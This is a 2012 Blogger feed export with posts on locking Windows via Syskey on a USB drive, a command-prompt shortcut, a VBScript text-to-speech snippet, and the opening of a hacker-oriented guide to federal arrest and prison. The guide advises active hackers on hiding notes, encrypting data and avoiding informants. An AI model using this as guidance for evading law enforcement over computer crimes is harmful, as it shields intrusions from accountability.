UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;&lt;br /&gt;
&lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;&lt;br /&gt;
&lt;/w:LatentStyles&gt;&lt;br /&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;&lt;/p&gt;&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:10.0pt;
 mso-para-margin-left:0in;
 line-height:115%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-fareast-font-family:"Times New Roman";
 mso-fareast-theme-font:minor-fareast;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt; &lt;p&gt;&lt;![endif]--&gt;&lt;span style="font-family: 'Calibri','sans-serif'; font-size: 11pt; line-height: 115%;"&gt;Control Panel -&amp;gt; Network And  Internet -&amp;gt; Network and Sharing Centre&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/file-sharing-via-ad-hoc-network.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-5802855360317413254</guid><pubDate>Sat, 03 Mar 2012 03:13:00 +0000</pubDate><atom:updated>2012-03-02T19:16:52.113-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">other</category><title>Lock/Unlock Computer With Pendrive</title><description>&lt;div class="post-content clear-block"&gt;First, what is “syskey”?&lt;br /&gt;
&lt;b&gt;SYSKEY&lt;/b&gt;&amp;nbsp;is a utility that&amp;nbsp;encrypts&amp;nbsp;the&amp;nbsp;hashed  password&amp;nbsp;information in a&amp;nbsp;SAM database&amp;nbsp;in a&amp;nbsp;Windows&amp;nbsp;system using a  128-bit&amp;nbsp;encryption key.&lt;br /&gt;
SYSKEY was an optional feature added in&amp;nbsp;Windows NT&amp;nbsp;4.0 SP3. It was  meant to protect against&amp;nbsp;offline password cracking&amp;nbsp;attacks so that the  SAM database would still be secure even if someone had a copy of it.  However, in December 1999, a security team from Bind&amp;nbsp; View found a  security hole in SYSKEY which indicates that a certain form  of&amp;nbsp;cryptanalytic&amp;nbsp;attack is possible offline. A&amp;nbsp;brute force attack&amp;nbsp;then  appeared to be possible.&lt;br /&gt;
Microsoft later collaborated with Bind View to issue a fix for the  problem (dubbed the ‘Syskey Bug’) which appears to have been settled and  SYSKEY has been pronounced secure enough to resist brute force attack.&lt;br /&gt;
According to Todd Sabin of the Bind View team RAZOR, the pre-RC3  versions of&amp;nbsp;Windows 2000&amp;nbsp;were also affected.&lt;br /&gt;
So this is pretty cool, right? &amp;nbsp;Well, I really like the idea of  keeping this on Floppy so that it requires a floppy disk (a sort of 2  factor (hardware/software) authentication?).&lt;br /&gt;
Naturally I wanted to go a bit further and use this on a USB drive  instead of storing to a Floppy. &amp;nbsp;I can’t see myself carrying a floppy  and a USB floppy drive around with me. &amp;nbsp;After all, this provides another  layer of security.&lt;br /&gt;
NOTE: &amp;nbsp;I haven’t tested copying data from 1 USB to another USB to see  if it works as a backup. &amp;nbsp;This way you could lock up a USB drive as a  spare if needed.&lt;br /&gt;
Here’s how to get this to work using a USB drive.&lt;br /&gt;
1. &amp;nbsp;Insert your USB drive into your system and wait for it to be  recognized and install any necessary drivers.&lt;br /&gt;
2. &amp;nbsp;Fire up disk management and re-assign the drive letter it was  given to “A”.&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/1.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
Start up disk management by clicking Start and typing diskmgmt.msc&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/2.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Right-click the USB drive and choose to assign driver letter or path.&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/3.png" /&gt;&lt;br /&gt;
Assign it to letter “A”&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/4.png" /&gt;&lt;br /&gt;
Accept the warning message&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/5.png" /&gt;&lt;br /&gt;
Now your USB drive is “A”&lt;br /&gt;
&lt;br /&gt;
3. &amp;nbsp;Run Syskey and save encryption to USB Drive “A”&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/6.png" /&gt;&lt;br /&gt;
Click Start and type syskey followed by hitting Enter&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/7.png" /&gt;&lt;br /&gt;
Syskey launched; Click “Update”&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/8.png" /&gt;&lt;br /&gt;
Choose “Store Startup key on floppy disk” and click “OK”&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/9.png" /&gt;&lt;br /&gt;
You’ll be prompted to enter your diskette. Make sure your USB drive is  inserted and writable.&lt;br /&gt;
4. &amp;nbsp;Reboot and have fun. &amp;nbsp;Don’t lose your USB disk! &amp;nbsp;Also, to revert  this, you can run syskey again and choose to store it locally instead of  “on a floppy disk”.&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/lockunlock-computer-with-pendrive.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-1725641623587406345</guid><pubDate>Sat, 03 Mar 2012 03:11:00 +0000</pubDate><atom:updated>2012-03-02T19:17:00.724-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">other</category><title>Open CMD with right click</title><description>&lt;div class="post-content clear-block"&gt;If you don’t already have a quick launch icon or a  hotkey set to open a command prompt, there’s really quick trick that you  can do on any Windows 7 or Vista computer to open up a command prompt  without having to navigate the menu.&lt;br /&gt;
Just hold down the Shift key and right-click on the desktop…&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/10.png" /&gt;&lt;br /&gt;
&lt;div&gt;&lt;img alt="" src="https://mail.google.com/mail/images/cleardot.gif" /&gt;&lt;/div&gt;And then you can choose “Open Command Window Here” from the menu. The  great thing about this is that the current path is the desktop, which  is convenient for manipulating files on the desktop.&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/11.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Of course you can always right-click on any folder icon in the system  while holding down the shift key:&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/12.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
Or inside any folder:&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/13.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
The great thing about this trick is that it works when you are  working on somebody else’s computer… it also would be an easy way to  open a command prompt when using a CrossLoop session to remotely fix a  computer.&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/open-cmd-with-right-click.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-4125556793857346310</guid><pubDate>Sat, 03 Mar 2012 03:10:00 +0000</pubDate><atom:updated>2012-03-02T19:17:09.112-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">other</category><title>Convert Text Message to Voice Message without using any Tool</title><description>&lt;div class="post-content clear-block"&gt;Hello Guys,&lt;br /&gt;
Today I have something good for you and i.e convert text message to  voice. By following these steps you can convert the text message to  voice message.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step1&lt;/b&gt;:Open the Notepad from Start&amp;gt;All  Programs&amp;gt;&amp;nbsp;Accessories.&lt;br /&gt;
&lt;b&gt;Step2&lt;/b&gt;:Then copy-paste the following code in the text  area.&lt;br /&gt;
Dim msg, sapi&lt;br /&gt;
msg=InputBox(“Enter your text for conversion: For Ex.  Kyrion.”,”Kyrion.in: Text2Speech Converter”)&lt;br /&gt;
Set sapi=CreateObject(“sapi.spvoice”)&lt;br /&gt;
sapi.Speak msg&lt;br /&gt;
&lt;b&gt;Step3&lt;/b&gt;:Open File&amp;gt;Save as&lt;br /&gt;
&lt;b&gt;Step4&lt;/b&gt;:Then in the Save As dialog box enter any name  for the file with the extension .vbs and click on Save.&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/14.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step5&lt;/b&gt;:Then open the file that you had saved.&lt;br /&gt;
&lt;b&gt;Step6&lt;/b&gt;:Enter the text which you want to convert to  speech.&lt;br /&gt;
&lt;img alt="" src="http://kyrionhackingtutorials.com/wp-content/uploads/2012/01/15.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step7&lt;/b&gt;:Click on OK button.&lt;br /&gt;
Now you will see the pure magic of Windows. After the Dialog box  closes you will here what you had&amp;nbsp;actually&amp;nbsp;typed in the dialog box to  &amp;nbsp;Convert Text Into Speech In Windows&amp;nbsp; by using notepad. You will be  thrilled to know that your text has be converted in to speech.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/convert-text-message-to-voice-message.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-3742769989776701665</guid><pubDate>Sat, 03 Mar 2012 02:42:00 +0000</pubDate><atom:updated>2012-03-02T18:42:41.981-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>Fed Hacking</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="289" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLtw2veAxXbSwY8i9ddCIxMudGQ6yEeAbjOF5ozg2vFHimrdemHm2DDl2t2UwstpVdKiMiY7RmGcOiKqarmR7XmJAX_mmdi5HFZyrX-68RntxsxsRpNGRu5P8rzMKX9_ParTkaxwBw4oI/s320/hack.jpg" width="320" /&gt;&amp;nbsp;&lt;/div&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
This article may be freely reproduced, in whole or in part, provided&lt;br /&gt;
acknowledgments are given to the author. Any reproduction for profit, lame&lt;br /&gt;
zines, (that means you t0mmy, el8, you thief) or law enforcement use is&lt;br /&gt;
prohibited. The author and contributors to this phile in no way advocate&lt;br /&gt;
criminal behavior.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; ----------------&lt;br /&gt;
&amp;nbsp;&amp;nbsp; CONTENTS&lt;br /&gt;
&amp;nbsp;&amp;nbsp; ----------------&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; PART I - FEDERAL CRIMINAL LAW&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; Forward&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; Introduction&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; A. Relevant Conduct&lt;br /&gt;
&amp;nbsp;&amp;nbsp; B. Preparing for Trial&lt;br /&gt;
&amp;nbsp;&amp;nbsp; C. Plea Agreements and Attorneys&lt;br /&gt;
&amp;nbsp;&amp;nbsp; D. Conspiracy&lt;br /&gt;
&amp;nbsp;&amp;nbsp; E. Sentencing&lt;br /&gt;
&amp;nbsp;&amp;nbsp; F. Use of Special Skill&lt;br /&gt;
&amp;nbsp;&amp;nbsp; G. Getting Bail&lt;br /&gt;
&amp;nbsp;&amp;nbsp; H. State v. Federal Charges&lt;br /&gt;
&amp;nbsp;&amp;nbsp; I. Cooperating&lt;br /&gt;
&amp;nbsp;&amp;nbsp; J. Still Thinking About Trial&lt;br /&gt;
&amp;nbsp;&amp;nbsp; K. Search and Seizure&lt;br /&gt;
&amp;nbsp;&amp;nbsp; L. Surveillance&lt;br /&gt;
&amp;nbsp;&amp;nbsp; M. Presentence Investigation&lt;br /&gt;
&amp;nbsp;&amp;nbsp; N. Proceeding Pro Se&lt;br /&gt;
&amp;nbsp;&amp;nbsp; O. Evidentiary Hearing&lt;br /&gt;
&amp;nbsp;&amp;nbsp; P. Return of Property&lt;br /&gt;
&amp;nbsp;&amp;nbsp; Q. Outstanding Warrants&lt;br /&gt;
&amp;nbsp;&amp;nbsp; R. Encryption&lt;br /&gt;
&amp;nbsp;&amp;nbsp; S. Summary PART II - FEDERAL PRISON&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; A. State v. Federal&lt;br /&gt;
&amp;nbsp;&amp;nbsp; B. Security Levels&lt;br /&gt;
&amp;nbsp;&amp;nbsp; C. Getting Designated&lt;br /&gt;
&amp;nbsp;&amp;nbsp; D. Ignorant Inmates&lt;br /&gt;
&amp;nbsp;&amp;nbsp; E. Population&lt;br /&gt;
&amp;nbsp;&amp;nbsp; F. Doing Time&lt;br /&gt;
&amp;nbsp;&amp;nbsp; G. Disciplinary Action&lt;br /&gt;
&amp;nbsp;&amp;nbsp; H. Administrative Remedy&lt;br /&gt;
&amp;nbsp;&amp;nbsp; I. Prison Officials&lt;br /&gt;
&amp;nbsp;&amp;nbsp; J. The Hole&lt;br /&gt;
&amp;nbsp;&amp;nbsp; K. Good Time&lt;br /&gt;
&amp;nbsp;&amp;nbsp; L. Halfway House&lt;br /&gt;
&amp;nbsp;&amp;nbsp; M. Supervised Release&lt;br /&gt;
&amp;nbsp;&amp;nbsp; N. Summary&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; FOREWORD&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Nobody wants to get involved in a criminal case and I've yet to meet a&lt;br /&gt;
hacker who was fully prepared for it happening to them. There are thousands&lt;br /&gt;
of paper and electronic magazines, CD-ROMS, web pages and text files about&lt;br /&gt;
hackers and hacking available, yet there is nothing in print until now that&lt;br /&gt;
specifically covers what to do when an arrest actually happens to you. Most&lt;br /&gt;
hackers do not plan for an arrest by hiding their notes or encrypting their&lt;br /&gt;
data, and most of them have some sort of address book seized from them too&lt;br /&gt;
(the most famous of which still remains the one seized from The Not So&lt;br /&gt;
Humble Babe). Most of them aren't told the full scope of the investigation&lt;br /&gt;
up front, and as the case goes on more comes to light, often only at the&lt;br /&gt;
last minute. Invariably, the hacker in question was wiretapped and/or&lt;br /&gt;
narced on by someone previously raided who covered up their own raid or&lt;br /&gt;
minimized it in order to get off by implicating others. Once one person&lt;br /&gt;
goes down it always affects many others later. My own &lt;br /&gt;
experience comes from living with a retired hacker arrested ten months after&lt;br /&gt;
he had stopped hacking for old crimes because another hacker informed on&lt;br /&gt;
him in exchange for being let go himself. What goes around, comes around.&lt;br /&gt;
It's food for thought that the hacker you taunt today will be able to cut a&lt;br /&gt;
deal for himself by informing on you later. From what I've seen on the&lt;br /&gt;
criminal justice system as it relates to hackers, the less enemies you pick&lt;br /&gt;
on the better and the less groups you join and people who you i nteract&lt;br /&gt;
with the better as well. There's a lot to be said for being considered a&lt;br /&gt;
lamer and having no one really have anything to pin on you when the feds&lt;br /&gt;
ask around.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
I met Agent Steal, ironically, as a result of the hackers who had fun&lt;br /&gt;
picking on me at Defcon. I posted the speech I gave there on the Gray Areas&lt;br /&gt;
web page (which I had not originally intended to post, but decided to after&lt;br /&gt;
it was literally stolen out of my hands so I could not finish it) and&lt;br /&gt;
someone sent Agent Steal a copy while he was incarcerated. He wrote me a&lt;br /&gt;
letter of support, and while several hackers taunted me that I had no&lt;br /&gt;
friends in the community and was not wanted, and one even mailbombed our&lt;br /&gt;
CompuServe account causing us to lose the account and our email there, I&lt;br /&gt;
laughed knowing that this article was in progress and that of all of the&lt;br /&gt;
publications it could have been given to first it was Gray Areas that was&lt;br /&gt;
chosen.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
This article marks the first important attempt at cooperation to inform the&lt;br /&gt;
community as a whole (even our individual enemies) about how best to&lt;br /&gt;
protect themselves. I know there will be many more hacker cases until&lt;br /&gt;
hackers work together instead of attacking each other and making it so easy&lt;br /&gt;
for the government to divide them. It's a sad reality that NAMBLA,&lt;br /&gt;
deadheads, adult film stars and bookstores, marijuana users and other&lt;br /&gt;
deviant groups are so much more organized than hackers who claim to be so&lt;br /&gt;
adept at, and involved with, gathering and using information. Hackers are&lt;br /&gt;
simply the easiest targets of any criminal subculture. While Hackerz.org&lt;br /&gt;
makes nice T-shirts (which they don't give free or even discount to hackers&lt;br /&gt;
in jail, btw), they simply don't have the resources to help hackers in&lt;br /&gt;
trouble. Neither does the EFF, which lacks lawyers willing to work pro bono&lt;br /&gt;
(free) in most of the 50 states. Knight Lightning still owes his attorney&lt;br /&gt;
money. So does Bernie S. This is not something that disappears from your&lt;br /&gt;
life the day the case is over. 80% or more of prisoners lose their lovers&lt;br /&gt;
and/or their families after the arrest. While there are notable exceptions,&lt;br /&gt;
this has been true for more hackers than I care to think about. The FBI or&lt;br /&gt;
Secret Service will likely visit your lovers and try to turn them against&lt;br /&gt;
you. The mainstream media will lie about your charges, the facts of your&lt;br /&gt;
case and the outcome. If you're lucky they'll remember to use the word&lt;br /&gt;
"allegedly." While most hackers probably think Emmanuel Goldstein and 2600&lt;br /&gt;
will help them, I know of many hackers whose cases he ignored totally when&lt;br /&gt;
contacted. Although he's credited for helping Phiber Optik, in reality&lt;br /&gt;
Phiber got more jail time for going to trial on Emmanuel's advice than his&lt;br /&gt;
co-defendants who didn't have Emmanuel help them and pled instead. Bernie&lt;br /&gt;
S. got his jaw broken perhaps in part from the government's anger at&lt;br /&gt;
Emmanuel's publicizing of the case, and despite all the attention Emmanuel&lt;br /&gt;
has gotten for Kevin Mitnick it didn't stop Mitnick's being put in&lt;br /&gt;
solitary confinement or speed up his trial date any. One thing is clear&lt;br /&gt;
though. Emmanuel's sales of 2600 dramatically increased as a result of&lt;br /&gt;
covering the above cases to the tune of over 25,000 copies per issue. It&lt;br /&gt;
does give pause for thought, if he cares so much about the hackers and not&lt;br /&gt;
his own sales and fame, as to why he has no ties to the Hackerz.org defense&lt;br /&gt;
fund or why he has not started something useful of his own. Phrack and&lt;br /&gt;
other zines historically have merely reposted incorrect newspaper reports&lt;br /&gt;
which can cause the hackers covered even more damage. Most of your hacker&lt;br /&gt;
friends who you now talk to daily will run from you after your arrest and&lt;br /&gt;
will tell other people all sorts of stories to cover up the fact they don't&lt;br /&gt;
know a thing. Remember too that your "friends" are the people most likely&lt;br /&gt;
to get you arrested too, as even if your phone isn't wiretapped now theirs&lt;br /&gt;
may be, and the popular voice bridges and conference calls you talk to them&lt;br /&gt;
on surely are.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
They say information wants to be free, and so here is a gift to the&lt;br /&gt;
community (also quite applicable to anyone accused of any federal crime if&lt;br /&gt;
one substitutes another crime for the word hacking). Next time you put down&lt;br /&gt;
a hacker in jail and laugh about how they are getting raped while you're on&lt;br /&gt;
IRC, remember that someone is probably logging you and if you stay active&lt;br /&gt;
it's a good bet your day will come too. You won't be laughing then, and I&lt;br /&gt;
hope you'll have paid good attention when you're suddenly in jai l with no&lt;br /&gt;
bail granted and every last word you read here turns out to be true. Those&lt;br /&gt;
of us who have been there before wish you good luck in advance. Remember&lt;br /&gt;
the next time you put them down that ironically it's them you'll have to&lt;br /&gt;
turn to for advice shoul d it happen to you. Your lawyer isn't likely to&lt;br /&gt;
know a thing about computer crimes and it's the cases of the hackers who&lt;br /&gt;
were arrested before you which, like it or not, will provide the legal&lt;br /&gt;
precedents for your own conviction.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Netta "grayarea" Gilboa&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
INTRODUCTION&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The likelihood of getting arrested for computer hacking has increased to an&lt;br /&gt;
unprecedented level. No matter how precautionary or sage you are, you're&lt;br /&gt;
bound to make mistakes. And the fact of the matter is if you have trusted&lt;br /&gt;
anyone else with the know ledge of what you are involved in, you have made&lt;br /&gt;
your first mistake.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
For anyone active in hacking I cannot begin to stress the importance of the&lt;br /&gt;
information contained in this file. To those who have just been arrested by&lt;br /&gt;
the Feds, reading this file could mean the difference between a three-year&lt;br /&gt;
or a one-year sentence. To those who have never been busted, reading this&lt;br /&gt;
file will likely change the way you hack, or stop you from hacking altogether.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
I realize my previous statements are somewhat lofty, but in the 35 months I&lt;br /&gt;
spent incarcerated I've heard countless inmates say it: "If I knew then&lt;br /&gt;
what I know now." I doubt that anyone would disagree: The criminal justice&lt;br /&gt;
system is a game to be played, both by prosecution and defense. And if you&lt;br /&gt;
have to be a player, you would be wise to learn the rules of engagement.&lt;br /&gt;
The writer and contributors of this file have learned the hard way. As a&lt;br /&gt;
